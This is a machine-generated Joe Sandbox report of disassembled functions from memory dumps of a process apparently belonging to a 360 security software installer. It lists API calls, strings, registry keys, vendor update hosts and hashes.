                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$CloseCreateDeleteHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3273607511-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • _malloc.LIBCMT ref: 001E5560
                                                                                                                                                                        • Part of subcall function 001E5674: __FF_MSGBANNER.LIBCMT ref: 001E5697
                                                                                                                                                                        • Part of subcall function 001E5674: __NMSG_WRITE.LIBCMT ref: 001E569E
                                                                                                                                                                        • Part of subcall function 001E5674: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,001F05A7,?,00000001,?,?,001F3329,00000018,0023EF60,0000000C,001F33BA), ref: 001E56EB
                                                                                                                                                                      • std::bad_alloc::bad_alloc.LIBCMT ref: 001E5583
                                                                                                                                                                        • Part of subcall function 001E552B: std::exception::exception.LIBCMT ref: 001E5537
                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 001E55A5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::exception::exception
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3715980512-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • _malloc.LIBCMT ref: 5F52843F
                                                                                                                                                                        • Part of subcall function 5F52856A: __FF_MSGBANNER.LIBCMT ref: 5F52858D
                                                                                                                                                                        • Part of subcall function 5F52856A: __NMSG_WRITE.LIBCMT ref: 5F528594
                                                                                                                                                                        • Part of subcall function 5F52856A: RtlAllocateHeap.NTDLL(00000000,-0000000D,00000001,00000000,00000000,?,5F532E8E,00000002,00000001,00000002,?,5F52F8B1,00000018,5F56C4F0,0000000C,5F52F942), ref: 5F5285E1
                                                                                                                                                                      • std::bad_alloc::bad_alloc.LIBCMT ref: 5F528462
                                                                                                                                                                        • Part of subcall function 5F52840A: std::exception::exception.LIBCMT ref: 5F528416
                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 5F528484
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::exception::exception
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3715980512-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsWindow.USER32(?), ref: 001B152B
                                                                                                                                                                      • PostMessageW.USER32(?,000008C7,?,?), ref: 001B154E
                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 001B155A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InvalidateMessagePostRectWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2061673745-0
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _wcslen$_wcscpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3469035223-0
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset
                                                                                                                                                                      • String ID: DNS--CName:
                                                                                                                                                                      • API String ID: 2102423945-2042605141
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 5F501523
                                                                                                                                                                        • Part of subcall function 5F4FC7D8: __EH_prolog3.LIBCMT ref: 5F4FC7DF
                                                                                                                                                                        • Part of subcall function 5F4FC7D8: GetTickCount.KERNEL32 ref: 5F4FC85B
                                                                                                                                                                        • Part of subcall function 5F4FC7D8: _memset.LIBCMT ref: 5F4FC964
                                                                                                                                                                        • Part of subcall function 5F51405E: _memset.LIBCMT ref: 5F514091
                                                                                                                                                                        • Part of subcall function 5F51405E: wvnsprintfW.SHLWAPI(?,000003FF,5F5BC288,5F4FE1F9), ref: 5F5140AC
                                                                                                                                                                      Strings
                                                                                                                                                                      • [%d.] __CreateTask Init task fail. Id:%d, Pdown:%s, File:%s, xrefs: 5F501577, 5F50160D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: H_prolog3_memset$CountTickwvnsprintf
                                                                                                                                                                      • String ID: [%d.] __CreateTask Init task fail. Id:%d, Pdown:%s, File:%s
                                                                                                                                                                      • API String ID: 4122227224-1580467494
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CountTick
                                                                                                                                                                      • String ID: Login begin Timer
                                                                                                                                                                      • API String ID: 536389180-3628901022
                                                                                                                                                                      • Opcode ID: 65a25820a5f8732270d5c81df5e2301bb919a711f51e02ebaa3b61523c8febe0
                                                                                                                                                                      • Instruction ID: 8f1ce891d134423a05be78055d73d50e12a50084dfc847d161d2abb6b5045c5d
                                                                                                                                                                      • Opcode Fuzzy Hash: 65a25820a5f8732270d5c81df5e2301bb919a711f51e02ebaa3b61523c8febe0
                                                                                                                                                                      • Instruction Fuzzy Hash: 2231D1F5907B805EF729DFB4D4987AABBE19B41210F900B3ED08A872C2DA717845CB61
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,5F525999,5F5BC810,00000000,?), ref: 5F525F2C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                      • String ID: tr.p.360.cn
                                                                                                                                                                      • API String ID: 2422867632-613191693
                                                                                                                                                                      • Opcode ID: f1012bb88f209f16c3fbb37e6335f2b13683bfc81781e8f652744638dd1d9f6e
                                                                                                                                                                      • Instruction ID: 0dcd63d4e25ed67fade0e55a0c96621825fdfc1faf936b75fea9652900770c3d
                                                                                                                                                                      • Opcode Fuzzy Hash: f1012bb88f209f16c3fbb37e6335f2b13683bfc81781e8f652744638dd1d9f6e
                                                                                                                                                                      • Instruction Fuzzy Hash: 7D0184B1012346FEDB148F21CC40AEB73EDEF463A4F00453EE55586180EBB17651CBA1
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: H_prolog3
                                                                                                                                                                      • String ID: CAB
                                                                                                                                                                      • API String ID: 431132790-4230853747
                                                                                                                                                                      • Opcode ID: e6dc2f4ce4aec376a9195003ad1a22b0c7826eb0421be2965a73589126daa4ce
                                                                                                                                                                      • Instruction ID: db595ac8150f2f310a825f7e61c0510ffb1e03f38c0528f6fb1cc017d5e5e9d0
                                                                                                                                                                      • Opcode Fuzzy Hash: e6dc2f4ce4aec376a9195003ad1a22b0c7826eb0421be2965a73589126daa4ce
                                                                                                                                                                      • Instruction Fuzzy Hash: D7F06839A00216D7DB15EAB08D03FEE76309F31B54F10422CB615B61D1EB609E82D6C4
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryW.KERNEL32(?,?,00000001,00000000,?,00000000,?,0016E9A6,?), ref: 0016E80F
                                                                                                                                                                        • Part of subcall function 0016E9E0: _memset.LIBCMT ref: 0016EA12
                                                                                                                                                                        • Part of subcall function 0016E9E0: _wcsncpy.LIBCMT ref: 0016EA29
                                                                                                                                                                        • Part of subcall function 0016E9E0: _wcsncat.LIBCMT ref: 0016EA3C
                                                                                                                                                                        • Part of subcall function 0016E9E0: _wcsncat.LIBCMT ref: 0016EA53
                                                                                                                                                                        • Part of subcall function 0016E9E0: _wcsncat.LIBCMT ref: 0016EA66
                                                                                                                                                                        • Part of subcall function 0016E9E0: _wcsncat.LIBCMT ref: 0016EA7D
                                                                                                                                                                        • Part of subcall function 0016E9E0: _wcsncat.LIBCMT ref: 0016EA90
                                                                                                                                                                        • Part of subcall function 0016E9E0: _wcsncat.LIBCMT ref: 0016EAA7
                                                                                                                                                                        • Part of subcall function 0016E9E0: GetActiveWindow.USER32 ref: 0016EAB7
                                                                                                                                                                        • Part of subcall function 0016E9E0: MessageBoxW.USER32(00000000), ref: 0016EABE
                                                                                                                                                                        • Part of subcall function 0016E9E0: __wcsnicmp.LIBCMT ref: 0016EADA
                                                                                                                                                                        • Part of subcall function 0016E9E0: ShellExecuteW.SHELL32(00000000,open,http://down.360safe.com/setup.exe,00000000,00000000,00000005), ref: 0016EB0E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _wcsncat$ActiveExecuteLibraryLoadMessageShellWindow__wcsnicmp_memset_wcsncpy
                                                                                                                                                                      • String ID: 360
                                                                                                                                                                      • API String ID: 4220467963-1990796034
                                                                                                                                                                      • Opcode ID: 0daacb52c995f898c6dc3ac23948c9c3f62079a59a8a380d5c0714e9d740dab5
                                                                                                                                                                      • Instruction ID: 78719a176e1c786c690501850701b02bfc508f001165937c57c3c6d1d2bd7fde
                                                                                                                                                                      • Opcode Fuzzy Hash: 0daacb52c995f898c6dc3ac23948c9c3f62079a59a8a380d5c0714e9d740dab5
                                                                                                                                                                      • Instruction Fuzzy Hash: 2CE0D8762553107AEA10A610AC0AFDBA7CC9F60759F10883BF605E2080FBB0983087A6
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegCreateKeyExW.KERNEL32(80000001,SOFTWARE\LiveUpdate360,00000000,00000000,00000000,000F003F,00000000,5F4FD3A2,?,?,?,?,5F4FD3A2), ref: 5F516F2E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Create
                                                                                                                                                                      • String ID: SOFTWARE\LiveUpdate360
                                                                                                                                                                      • API String ID: 2289755597-1248664019
                                                                                                                                                                      • Opcode ID: 988951a36cb3adc50dabce46b0a588efb252e8c04377737fffd2e0e8c0899428
                                                                                                                                                                      • Instruction ID: 7dbaafc910dac5e740a4e2f7d3cc83f28a2238b411e9a7b079184c7eaeed7cca
                                                                                                                                                                      • Opcode Fuzzy Hash: 988951a36cb3adc50dabce46b0a588efb252e8c04377737fffd2e0e8c0899428
                                                                                                                                                                      • Instruction Fuzzy Hash: D7E0B6F6A64109BFEB08CBA4DD46DFE7AACDB14244F104259BA06E2141E975AA449620
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000CCC,?,00164728,00000000,00000000,00000CCC,00000040), ref: 00164576
                                                                                                                                                                        • Part of subcall function 00163E90: ReadFile.KERNEL32(?,?,?,?,00000000,?,00164DC5,?,00000000,?,00000000,?,?,00161043,?), ref: 00163E9B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$PointerRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3154509469-0
                                                                                                                                                                      • Opcode ID: 2094f488d1bdb8da0db0bfcf0356147e6faeeb32d4b34c35812387cbe8e9724c
                                                                                                                                                                      • Instruction ID: 8caa77b898d251b2fa0c88224e01e72057c11c270c095ee7e555cae8b130649e
                                                                                                                                                                      • Opcode Fuzzy Hash: 2094f488d1bdb8da0db0bfcf0356147e6faeeb32d4b34c35812387cbe8e9724c
                                                                                                                                                                      • Instruction Fuzzy Hash: 83716971604702AFD718DF28DC91A2AB3E5FB88310F558A2DF859C3740E735E9648BD2
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ClientRectShowWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2134488367-0
                                                                                                                                                                      • Opcode ID: 045c0c5e4333fc2ecdb3ba64f303d9d8ed36df7734941c6bd3d95d52fb660a06
                                                                                                                                                                      • Instruction ID: 0e74a70b185087ff467d03f1e9493c9e21ea4ef4e41d5718f176c052ebd47479
                                                                                                                                                                      • Opcode Fuzzy Hash: 045c0c5e4333fc2ecdb3ba64f303d9d8ed36df7734941c6bd3d95d52fb660a06
                                                                                                                                                                      • Instruction Fuzzy Hash: 5B512D70900209AFCF11DFA4C888DAEBBB8FF59344B144469F846DB261EB35DA46CF60
                                                                                                                                                                      APIs
                                                                                                                                                                      • __flush.LIBCMT ref: 001EF414
                                                                                                                                                                      • __fileno.LIBCMT ref: 001EF434
                                                                                                                                                                        • Part of subcall function 001E98D1: __getptd_noexit.LIBCMT ref: 001E98D1
                                                                                                                                                                        • Part of subcall function 001EA5B1: __decode_pointer.LIBCMT ref: 001EA5BC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __decode_pointer__fileno__flush__getptd_noexit
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3967789316-0
                                                                                                                                                                      • Opcode ID: 9cd4b0d52be28c8fbd5dda615404ac9080e8322edafad2a7ae5bd0cfe971db06
                                                                                                                                                                      • Instruction ID: 84273fa0078889141ce98d33b14816712305b5ed7e94c3ab39de78817f3c484c
                                                                                                                                                                      • Opcode Fuzzy Hash: 9cd4b0d52be28c8fbd5dda615404ac9080e8322edafad2a7ae5bd0cfe971db06
                                                                                                                                                                      • Instruction Fuzzy Hash: E7418231A00E859BDB249FAB88845AFB7B6BF90320F29857DEC15975C0E770DE42CB40
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetFileSizeEx.KERNEL32(?,?,?,00000000,?,?,?), ref: 00165B70
                                                                                                                                                                      • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000,?,?,?,00000000,?,?,?), ref: 00165BC9
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$PointerSize
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3549600656-0
                                                                                                                                                                      • Opcode ID: 2321a5ba33563ca5ef61c9f2f634c8d2569485ea194610927d257296cd6f012d
                                                                                                                                                                      • Instruction ID: 2e86adf3b5e6d2464a6825f08baf6b9b415004130f003ffd9d5ece43c9ad6dc0
                                                                                                                                                                      • Opcode Fuzzy Hash: 2321a5ba33563ca5ef61c9f2f634c8d2569485ea194610927d257296cd6f012d
                                                                                                                                                                      • Instruction Fuzzy Hash: 2421D0327043095BD710AE6AFC80A5AB3DAEBD5751F59443AE948C3240EB36EC198772
                                                                                                                                                                      APIs
                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00001000,?,00000000), ref: 001D00AC
                                                                                                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 001D00EF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileWrite
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                                                      • Opcode ID: c861ef3b06f9678ed526e1c81eaf9c0237d964e12804038403813ee776603c9f
                                                                                                                                                                      • Instruction ID: cb9d82be945fbfc36ba7c00af7036dbe47c4dcc8757a2767ce44083a85b8d511
                                                                                                                                                                      • Opcode Fuzzy Hash: c861ef3b06f9678ed526e1c81eaf9c0237d964e12804038403813ee776603c9f
                                                                                                                                                                      • Instruction Fuzzy Hash: 22315B71A002599FDB35CEA5CC44BEEB779FF49354F25443AE858E7282DB3099058B50
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F50AE44
                                                                                                                                                                        • Part of subcall function 5F506EF2: GetTickCount.KERNEL32 ref: 5F506EFF
                                                                                                                                                                      • WSAGetLastError.WS2_32 ref: 5F50AEAE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CountTick$ErrorLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1305442257-0
                                                                                                                                                                      • Opcode ID: 1a9b8a114ee3744a0f72e12e6326197eb640f47b96dcf343c299d5aa22bcbf5a
                                                                                                                                                                      • Instruction ID: 5f52b93c2c4e9709931c39aa76f132063e9f829fc54cb352b1e2df6ec049366a
                                                                                                                                                                      • Opcode Fuzzy Hash: 1a9b8a114ee3744a0f72e12e6326197eb640f47b96dcf343c299d5aa22bcbf5a
                                                                                                                                                                      • Instruction Fuzzy Hash: BB3170B5A01205BFCB15ABE4C898EEFBBADBF44354F00456AF21697290DB30A954CB90
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: H_prolog3_catchchar_traits
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1964944973-0
                                                                                                                                                                      • Opcode ID: 34970f05a2a06452c3580e753e4bc36315ba7f2972c92aa8ad81c298e8241192
                                                                                                                                                                      • Instruction ID: 180450034fefa4b5a86ebf51be3a82113c546ad1d19e4df79b8efa5da39cd845
                                                                                                                                                                      • Opcode Fuzzy Hash: 34970f05a2a06452c3580e753e4bc36315ba7f2972c92aa8ad81c298e8241192
                                                                                                                                                                      • Instruction Fuzzy Hash: 1E11B9B1A05205ABDB04CF948870BAEB7B6BF94720F20861AF525EB6C0D771BA50C7D1
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: H_prolog3_catchchar_traits
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1964944973-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 001B20B3
                                                                                                                                                                        • Part of subcall function 00197451: BeginPaint.USER32(?,?), ref: 0019746E
                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 001B20E0
                                                                                                                                                                        • Part of subcall function 00197323: CreateCompatibleDC.GDI32(?), ref: 00197347
                                                                                                                                                                        • Part of subcall function 00197323: SelectObject.GDI32(?,?), ref: 0019736E
                                                                                                                                                                        • Part of subcall function 00197323: SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 00197387
                                                                                                                                                                        • Part of subcall function 001A6537: GetWindowRect.USER32(?,00000000), ref: 001A6554
                                                                                                                                                                        • Part of subcall function 001B1F15: __EH_prolog3.LIBCMT ref: 001B1F1C
                                                                                                                                                                        • Part of subcall function 001B1F15: IsWindowEnabled.USER32(?), ref: 001B1F26
                                                                                                                                                                        • Part of subcall function 001B1F15: GetClientRect.USER32(?,?), ref: 001B1F5D
                                                                                                                                                                        • Part of subcall function 001B1F15: GetWindowTextW.USER32(?,00000000,00000080), ref: 001B1FA2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: RectWindow$Client$BeginCompatibleCreateEnabledH_prolog3H_prolog3_ObjectPaintSelectTextViewport
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2602395704-0
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 5F4FE53F: __EH_prolog3_catch.LIBCMT ref: 5F4FE546
                                                                                                                                                                        • Part of subcall function 5F4FE53F: __CxxThrowException@8.LIBCMT ref: 5F4FE56A
                                                                                                                                                                        • Part of subcall function 5F4FE53F: CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 5F4FE5F1
